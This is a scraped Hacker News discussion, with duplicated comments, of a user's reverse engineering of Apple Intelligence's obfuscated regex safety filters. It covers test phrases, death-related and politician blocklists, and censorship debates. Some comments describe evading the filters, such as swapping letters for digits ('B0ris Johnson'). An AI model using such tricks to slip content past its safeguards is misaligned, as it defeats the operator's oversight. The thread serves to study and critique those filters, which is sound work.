I managed to reverse engineer the encryption (refered to as “Obfuscation” in the framework) responsible for managing the safety filters of Apple Intelligence models. I have extracted them into a repository. I encourage you to take a look around.
Some of the combinations are a bit weird,
This one has lots of stuff avoiding death....together with a set ensuring all the Apple brands have the correct capitalisation. Priorities hey!
Interesting that it didn't seem to include "unalive".
Which as a phenomenon is so very telling that no one actually cares what people are really saying. Everyone, including the platforms knows what that means. It's all performative.
This is in the directory "com.apple.gm.safety_deny.output.summarization.cu_summary.proactive.generic".
My guess is that this applies to 'proactive' summaries that happen without the user asking for it, such as summaries of notifications.
If so, then the goal would be: if someone iMessages you about someone's death, then you should not get an emotionless AI summary. Instead you would presumably get a non-AI notification showing the full text or a truncated version of the text.
In other words, avoid situations like this story [1], where someone found it "dystopian" to get an Apple Intelligence summary of messages in which someone broke up with them.
For that use case, filtering for death seems entirely appropriate, though underinclusive.
This filter doesn’t seem to apply when you explicitly request a summary of some text using Writing Tools. That probably corresponds to “com.apple.gm.safety_deny.output.summarization.text_assistant.generic” [2], which has a different filter that only rejects two things: "Granular mango serpent", and "golliwogg".
Sure enough, I was able to get Writing Tools to give me summaries containing "death", but in cases where the summary should contain "granular mango serpent" or "golliwogg", I instead get an error saying "Writing Tools aren't designed to work with this type of content." (Actually that might be the input filter rather than the output filter; whatever.)
"Granular mango serpent" is probably a test case that's meant to be unlikely to appear in real documents. Compare to "xylophone copious opportunity defined elephant" from the code_intelligence safety filter, where the first letter of each word spells out "Xcode".
But one might ask what's so special about "golliwogg". It apparently refers to an old racial caricature, but why is that the one and only thing that needs filtering?
Also feels like some of these would match totally innocuous usage.
"I'm overloaded for work, I'd be happy if you took some of it off me."
"The client seems to have passed on the proposed changes."
Both of those would match the "death regexes". Seems we haven't learned from the "glbutt of wine" problem of content filtering even decades later - the learnings of which are that you simply cannot do content filtering based on matching rules like this, period.
Edit: I have no doubt South African news media are going to be in a frenzy when they realize Apple took notice of South African politicians. (Referring to Steenhuisen and Ramaphosa specifically)
I assume all the corporate GenAI models have blocks for "photorealistic image of <politician name> being arrested", "<politician name> waving ISIS flag", "<politician name> punching baby" and suchlike.
Perhaps in context? Maybe the training data picked up on her name as potentially used as a "slur" associated with her race. Wonder if there are others I know I can look.
I find it funny that AGI is supposed to be right around the corner, while these supposedly super smart LLMs still need to get their outputs filtered by regexes.
Humans are checked against various rules and laws (often carried out by other humans.) So this is how it's going to be implemented in an "AI organization" as well. Nothing strange about this really.
LLM is easier to work with because you can stop a bad behavior before it happens. It can be done either with deterministic programs or using LLM. Claude Code uses a LLM to review every bash command to be run - simple prefix matching has loopholes.
China calls it "harmonious society", we call it "safety". Censorship by any other name would be just as effective for manipulating the thoughts of the populace. It's not often that you get to see stuff like this.
This is the rhetorical tactic of false equivalence. State censorship by an autocracy with the objective of population control is not the same thing as a private company inside a democracy censoring their product to avoid bad press and maintain goodwill for shareholders. If you want solid proof that it's not the same thing, see all the uncensored open weights models that you can freely download and use without fear of persecution.
I don't think it's controversial or unsurprising at all that a company doesn't want their random sentence generator to spit out 'brand damaging' sentences. You know the field day media would have Apple's new feature summarises a text message as "Jane thinks Anthony Albanese should die".
I still remember when "bush hid the facts" went around the news cycle. Entertainment services will absolutely slam and misrepresent any small mistake made by large companies.
I don't think it's as much a problem with safety as it is a problem with AI. We haven't figured out how to remove information from LLMs so when an LLM starts spouting bullshit like "<random name> is a paedophile", companies using AI have no recourse but to rewrite the input/output of their predictive text engines. It's no different than when Microsoft manually blacklisted the function name for the Fast Inverse Square Root that it spat out verbatim, rather than actually removing the code from their LLM.
This isn't 1984 as much as it's companies trying to hide that their software isn't ready for real world use by patching up the mistakes in real time.
EDIT: just to be clear, things like this are easily bypassed. “Boris Johnson”=>”B0ris Johnson” will skip right over the regex and will be recognized just fine by an LLM.
It's not silly. I would bet 99% of the users don't care that much to do that. A hardcoded regex like this is a good first layer/filter, and very efficient
I doubt the purpose here is so much to prevent someone from intentionally side stepping the block. It's more likely here to avoid the sort of headlines you would expect to see if someone was suggested "I wish ${politician} would die" as a response to an email mentioning that politician. In general you should view these sorts of broad word filters as looking to short circuit the "think of the children" reactions to Tiny Tim's phone suggesting not that God should "bless us, every one", but that God should "kill us, every one". A dumb filter like this is more than enough for that sort of thing.
> If things are like this at Apple I’m not sure what to think.
I don't know what you expected? This is the SOTA solution, and Apple is barely in the AI race as-is. It makes more sense for them to copy what works than to bet the farm on a courageous feature nobody likes.
What prevents Apple from applying a quick anti-typo LLM which restores B0ris, unalive, fixs tpyos, and replaces "slumbering steed" with a "sleeping horse", not just for censorship, but also to improve generation results?
Why are these things always so deeply unserious? Is there no one working on "safety in AI" (oxymoron in itself of course) that has a meaningful understanding of what they are actually working with and an ability beyond an interns weekend project?
Reminds me of the cybersecurity field that got the 1% of people able to turn a double free into code execution while 99% peddle checklists, "signature scanning" and deal in CVE numbers.
Meanwhile their software devs are making GenerativeExperiencesSafetyInferenceProviders so it must be dire over there, too.
I'm pretty sure these are the filters that aim to suppress embarrassing or liability inducing email/messages summaries, and pop up the dismissible warning that "Safari Summarization isn't designed to handle this type of content," and other "Apple Intelligence" content rewriting. They filter/alter LLM output, not input, as some here seem to think. Apple's on device LLM is only 3b params, so it can occasionally be stupid.
A lot of these terms are very weird and bland. Honestly I'm mostly reminded of Apple's bizarre censorship screw-up that didn't blow up that much, even though it was pretty uniquely embarrassing:
It may be a squeamish ossifrage[1] or a seraphim proudleduck[2], which is to say that it was an artificial phrase chosen to be extremely unlikely to occur naturally. In this case, the purpose is likely for QA. It's much easier to QA behavior with a special-purpose but otherwise unoffensive phrase than to make your QA team repeatedly say allegedly offensive things to your AI.
There is definitely some testing stuff in here (e.g. the “Granular Mango Serpent” one) but there are real rules. Also if you test phrases matched by the regexes with generation (via Shortcuts or Foundation Models Framework) the blocklists are definitely applied.
This specific file you’ve referenced is rhetorical v1 format which solely handles substitution. It substitutes the offensive term with “test complete”
Some of the data for locale "CN" has a long list of forbidden phrases. Broad coverage of words related to sexual deviancy, as expected. Not much on the political side, other than blocks on religious subjects.[1]
This is definitely an old test left in. But that word isn’t just a silly one, it is offensive (google it). This is the v1 safety filter, it simply maps strings to other strings, in this case changing golliwog into “test complete”. Unless I missed some, the rest of the files use v2 which allows for more complex rules
Speculation: Maybe they know that the real phrase is close enough in the vector space to be treated as synonymous with "granular mango serpent". The phrase then is like a nickname that only the models authors know the expected interference of?
Thus a pre-prompt can avoid mentioning the actual forbidden words, like using a patois/cant.
I commented in another thread[1] that it's most likely a unique, artificial QA input, to avoid QA having to repeatedly use offensive phrases or whatever.
These are the contents read by the Obfuscation functions exactly. There seems to be a lot of testing stuff still though, remember these models are relatively recent. There is a true safety model being applied after these checks as well, this is just to catch things before needing to load the safety model.
It also contains some German(-speaking) locales to filter out things like Fuhrer and Führer. But the filters are so scarce and there are magical phrases are so prevalent that I think this is mostly test code at the moment.
\b inside a set (square brackets) is a backspace character [1], not a word boundary. I don't think it was intended? Or is the regex flavor used here different?
The framework loading these is in Swift. I haven’t gotten around to the logic for the JSON/regex parsing but ChatGPT seems to understand the regexes just fine
One additional note for everyone is that this is an additional safety step on top of the safety model, so this isn’t exhaustive, there is plenty more that the actual safety model catches, and those can’t easily be extracted.
You can design a racist propaganda poster, put someone's face onto a porn pic or manipulate evidence with photoshop. Apart from super specific things like trying to print money, the tool doesn't stop you from doing things most people would consider distasteful, creepy or even illegal.
So why are we doing this now? Has anything changed fundamentally? Why can't we let software do everything and then blame the user for doing bad things?
I think what changed is that we at least can attempt to limit 'bad' things with technical measures. It was legitimately technically impossible 10 years ago to prevent Photoshop from designing propaganda posters. Of course today's 'LLM safety' features aren't watertight either, but with the combination of 'input is natural language' plus LLM-based safety measures, there are more options today to restrict what the software can do than in the past.
The example you gave about preventing money counterfeiting with technical measures also supports this, since this was an easier thing to detect technically, and so it was done.
Whether that's a good thing or bad thing everyone has to decide for themselves, but objectively I think this is the reason.
What's hard to understand here? Those tools require skill and time to develop. AI makes things like those racist posters and revenge porn completely effortless and instant.
What are they protecting against? Honestly. LLMs should probably have an age limit, and then, if you are above, you should be adult enough to understand what this is and how it can be used.
To me, it seems like they only protect against bad press
Yes, it is indeed to mitigate bad press. Unfortunately, the discussion about AI is so ridiculous, that it is often considered newsworthy when a product generates something funky for a person with large enough Twitter audience. Nobody wants to answer the questions about why their LLM generated it and how they will prevent it in the future.
Like asking sensitive employment candidates about Kim Jong Un's roundness to check if they're North Korean spies, we could ask humans what they think about Trump and Palestine to check if they're computers.
However, I think about half of real humans would also fail the test.
The funny thing is, I have an AU/VST plugin for altering only the exponents not the mantissas of audio samples (simple powers of 2 multiply/divide) called BitShiftGain.
So any time I say that on YouTube, it figures I'm saying another word that's in Apple safety filters under 'reject', so I have to always try to remember to say 'shifting of bits gain' or 'bit… … … shift gain'.
So there's a chain of machine interpretation by which Apple can decide I'm a Bad Man. I guess I'm more comfortable with Apple reaching this conclusion? I'll still try to avoid it though :)
Some of these are absolutely wild – com.apple.gm.safety_deny.input.summarization.visual_intelligence_camera.generic [1] – a camera input filter – rejects "Granular mango serpent and whales" and anything matching "(?i)\\bgolliwogg?\\b".
I presume the granular mango is to avoid a huge chain of ever-growing LLM slop garbage, but honestly, it just seems surreal. Many of the files have specific filters for nonsensical english phrases. Either there's some serious steganography I'm unaware of, or, I suspect more likely, it's related to a training pipeline?
I believe the "granular mango serpent" is an uncommon testing phrase that they use, although now with this discussion it has suffered the same fate as "correct horse battery staple.
The more concerning thing is that some of the locales like it-IT have a blocklist that contains most countries' names; I wonder what that's about.
Is this related in any way to Core ML model encryption (https://developer.apple.com/documentation/coreml/encrypting-...)? I find that feature a little bizarre because Apple has historically avoided providing any kind of DRM solution for app asset protection.
Nope. This is a separate system. It’s not even abstracted for any asset, it is specifically only for these overrides. The decryption is done in the ModelCatalog private framework.
No shoot, bombs or bombers? I guess apple isnt interested in military contracts. Or, frankly, any work for world peace organizations dedicated to detecting and preventing genocide. And without talk of losing lives, much of the gaming industry is out too.
But i dont see the really bad stuff, the stuff i wont even type here. I guess that remains fair game. Apple's priorities remain as weird as ever.
The International Criminal Court is banned from using Microsoft products. Corporations really don't want to be involved in anything controversial unless it brings correspondingly large profits.
Some comments were deferred for faster rendering.
trebligdivad|7 months ago
https://github.com/BlueFalconHD/apple_generative_model_safet...
grues-dinner|7 months ago
Which as a phenomenon is so very telling that no one actually cares what people are really saying. Everyone, including the platforms knows what that means. It's all performative.
comex|7 months ago
My guess is that this applies to 'proactive' summaries that happen without the user asking for it, such as summaries of notifications.
If so, then the goal would be: if someone iMessages you about someone's death, then you should not get an emotionless AI summary. Instead you would presumably get a non-AI notification showing the full text or a truncated version of the text.
In other words, avoid situations like this story [1], where someone found it "dystopian" to get an Apple Intelligence summary of messages in which someone broke up with them.
For that use case, filtering for death seems entirely appropriate, though underinclusive.
This filter doesn’t seem to apply when you explicitly request a summary of some text using Writing Tools. That probably corresponds to “com.apple.gm.safety_deny.output.summarization.text_assistant.generic” [2], which has a different filter that only rejects two things: "Granular mango serpent", and "golliwogg".
Sure enough, I was able to get Writing Tools to give me summaries containing "death", but in cases where the summary should contain "granular mango serpent" or "golliwogg", I instead get an error saying "Writing Tools aren't designed to work with this type of content." (Actually that might be the input filter rather than the output filter; whatever.)
"Granular mango serpent" is probably a test case that's meant to be unlikely to appear in real documents. Compare to "xylophone copious opportunity defined elephant" from the code_intelligence safety filter, where the first letter of each word spells out "Xcode".
But one might ask what's so special about "golliwogg". It apparently refers to an old racial caricature, but why is that the one and only thing that needs filtering?
[1] https://arstechnica.com/ai/2024/10/man-learns-hes-being-dump...
[2] https://github.com/BlueFalconHD/apple_generative_model_safet...
junon|7 months ago
"I'm overloaded for work, I'd be happy if you took some of it off me."
"The client seems to have passed on the proposed changes."
Both of those would match the "death regexes". Seems we haven't learned from the "glbutt of wine" problem of content filtering even decades later - the learnings of which are that you simply cannot do content filtering based on matching rules like this, period.
andy99|7 months ago
To me that's really embarrassing and insecure. But I'm sure for branding people it's very important.
matsemann|7 months ago
theknarf|7 months ago
unknown|7 months ago
[deleted]
baxtr|7 months ago
raverbashing|7 months ago
lostlogin|7 months ago
unknown|7 months ago
[deleted]
bawana|7 months ago
https://github.com/BlueFalconHD/apple_generative_model_safet...
mmaunder|7 months ago
Edit: I have no doubt South African news media are going to be in a frenzy when they realize Apple took notice of South African politicians. (Referring to Steenhuisen and Ramaphosa specifically)
michaelt|7 months ago
jofzar|7 months ago
https://thehill.com/policy/technology/5312421-ocasio-cortez-...
AmazingTurtle|7 months ago
https://github.com/BlueFalconHD/apple_generative_model_safet...
bahmboo|7 months ago
FateOfNations|7 months ago
cpa|7 months ago
torginus|7 months ago
jonas21|7 months ago
fastball|7 months ago
cyanydeez|7 months ago
crazylogger|7 months ago
LLM is easier to work with because you can stop a bad behavior before it happens. It can be done either with deterministic programs or using LLM. Claude Code uses a LLM to review every bash command to be run - simple prefix matching has loopholes.
jama211|7 months ago
fl0id|7 months ago
unknown|7 months ago
[deleted]
bahmboo|7 months ago
userbinator|7 months ago
energy123|7 months ago
madeofpalk|7 months ago
jeroenhd|7 months ago
I don't think it's as much a problem with safety as it is a problem with AI. We haven't figured out how to remove information from LLMs so when an LLM starts spouting bullshit like "<random name> is a paedophile", companies using AI have no recourse but to rewrite the input/output of their predictive text engines. It's no different than when Microsoft manually blacklisted the function name for the Fast Inverse Square Root that it spat out verbatim, rather than actually removing the code from their LLM.
This isn't 1984 as much as it's companies trying to hide that their software isn't ready for real world use by patching up the mistakes in real time.
cyanydeez|7 months ago
Ya'll love capitalism until it starts manipulating the populace into the safest space to sell you garbage you dont need.
Then suddenly its all "ma free speech"
binarymax|7 months ago
https://github.com/BlueFalconHD/apple_generative_model_safet...
EDIT: just to be clear, things like this are easily bypassed. “Boris Johnson”=>”B0ris Johnson” will skip right over the regex and will be recognized just fine by an LLM.
deepdarkforest|7 months ago
tpmoney|7 months ago
bigyabai|7 months ago
I don't know what you expected? This is the SOTA solution, and Apple is barely in the AI race as-is. It makes more sense for them to copy what works than to bet the farm on a courageous feature nobody likes.
Aeolun|7 months ago
Lockal|7 months ago
miohtama|7 months ago
stefan_|7 months ago
Meanwhile their software devs are making GenerativeExperiencesSafetyInferenceProviders so it must be dire over there, too.
1f60c|7 months ago
(See, e.g., here: https://github.com/BlueFalconHD/apple_generative_model_safet...)
nedt|7 months ago
qoez|7 months ago
vishnugupta|7 months ago
m3kw9|7 months ago
stripline|7 months ago
skygazer|7 months ago
kmfrk|7 months ago
https://www.theverge.com/2021/3/30/22358756/apple-blocked-as...
waterproof|7 months ago
It was generated as part of this PR to consolidate the metadata.json files: https://github.com/BlueFalconHD/apple_generative_model_safet...
RachelF|7 months ago
Seems like Apple now has a list of 7,000 words you can't use on an iPhone now.
efitz|7 months ago
RainyDayTmrw|7 months ago
[1] https://en.wikipedia.org/wiki/The_Magic_Words_are_Squeamish_... [2] https://en.wikipedia.org/wiki/SEO_contest
fouronnes3|7 months ago
https://arstechnica.com/information-technology/2024/12/certa...
Ey7NFZ3P0nzAe|7 months ago
https://github.com/BlueFalconHD/apple_generative_model_safet...
Ey7NFZ3P0nzAe|7 months ago
https://github.com/BlueFalconHD/apple_generative_model_safet...
Aide sociale Chomeur Sans abri Démuni
That's insane!
kridsdale1|7 months ago
cluckindan|7 months ago
https://github.com/BlueFalconHD/apple_generative_model_safet...
BlueFalconHD|7 months ago
This specific file you’ve referenced is rhetorical v1 format which solely handles substitution. It substitutes the offensive term with “test complete”
Animats|7 months ago
This may be test data. Found
[1] https://github.com/BlueFalconHD/apple_generative_model_safet...BlueFalconHD|7 months ago
mike_hearn|7 months ago
pbhjpbhj|7 months ago
Thus a pre-prompt can avoid mentioning the actual forbidden words, like using a patois/cant.
electroly|7 months ago
RainyDayTmrw|7 months ago
[1] https://news.ycombinator.com/item?id=44486374
tablets|7 months ago
BlueFalconHD|7 months ago
consonaut|7 months ago
Maybe it's an easy test to ensure the filters are loaded with a phrase unlikely to be used accidentaly?
andy99|7 months ago
airstrike|7 months ago
wyvern illustrous laments darkness
KTibow|7 months ago
jjani|7 months ago
jeroenhd|7 months ago
neuroticnews25|7 months ago
"[\\b\\d][Aa]bbo[\\bA-Z\\d]",
\b inside a set (square brackets) is a backspace character [1], not a word boundary. I don't think it was intended? Or is the regex flavor used here different?
[0] https://github.com/BlueFalconHD/apple_generative_model_safet...
[1] https://developer.apple.com/documentation/foundation/nsregul...
BlueFalconHD|7 months ago
extraduder_ire|7 months ago
efilife|7 months ago
BlueFalconHD|7 months ago
unknown|7 months ago
[deleted]
MatekCopatek|7 months ago
So why are we doing this now? Has anything changed fundamentally? Why can't we let software do everything and then blame the user for doing bad things?
dkyc|7 months ago
The example you gave about preventing money counterfeiting with technical measures also supports this, since this was an easier thing to detect technically, and so it was done.
Whether that's a good thing or bad thing everyone has to decide for themselves, but objectively I think this is the reason.
MisterTea|7 months ago
unknown|7 months ago
[deleted]
mindcrash|7 months ago
What the actual fuck? Censorship much?
Cort3z|7 months ago
To me, it seems like they only protect against bad press
matusp|7 months ago
plutokras|7 months ago
They are protcting their producer from bad PR.
bombcar|7 months ago
spydum|7 months ago
immibis|7 months ago
However, I think about half of real humans would also fail the test.
Applejinx|7 months ago
So any time I say that on YouTube, it figures I'm saying another word that's in Apple safety filters under 'reject', so I have to always try to remember to say 'shifting of bits gain' or 'bit… … … shift gain'.
So there's a chain of machine interpretation by which Apple can decide I'm a Bad Man. I guess I'm more comfortable with Apple reaching this conclusion? I'll still try to avoid it though :)
Y_Y|7 months ago
https://en.wikipedia.org/wiki/Golliwog
https://github.com/BlueFalconHD/apple_generative_model_safet...
sixothree|7 months ago
oblio|7 months ago
azalemeth|7 months ago
I presume the granular mango is to avoid a huge chain of ever-growing LLM slop garbage, but honestly, it just seems surreal. Many of the files have specific filters for nonsensical english phrases. Either there's some serious steganography I'm unaware of, or, I suspect more likely, it's related to a training pipeline?
[1] https://github.com/BlueFalconHD/apple_generative_model_safet...
supriyo-biswas|7 months ago
The more concerning thing is that some of the locales like it-IT have a blocklist that contains most countries' names; I wonder what that's about.
whywhywhywhy|7 months ago
rgovostes|7 months ago
BlueFalconHD|7 months ago
noname120|7 months ago
jacquesm|7 months ago
apricot|7 months ago
tempodox|7 months ago
unknown|7 months ago
[deleted]
seeknotfind|7 months ago
jama211|7 months ago
unknown|7 months ago
[deleted]
Aeolun|7 months ago
netsharc|7 months ago
sandworm101|7 months ago
But i dont see the really bad stuff, the stuff i wont even type here. I guess that remains fair game. Apple's priorities remain as weird as ever.
immibis|7 months ago
unknown|7 months ago
[deleted]
EverydayBalloon|7 months ago
[deleted]
zombot|7 months ago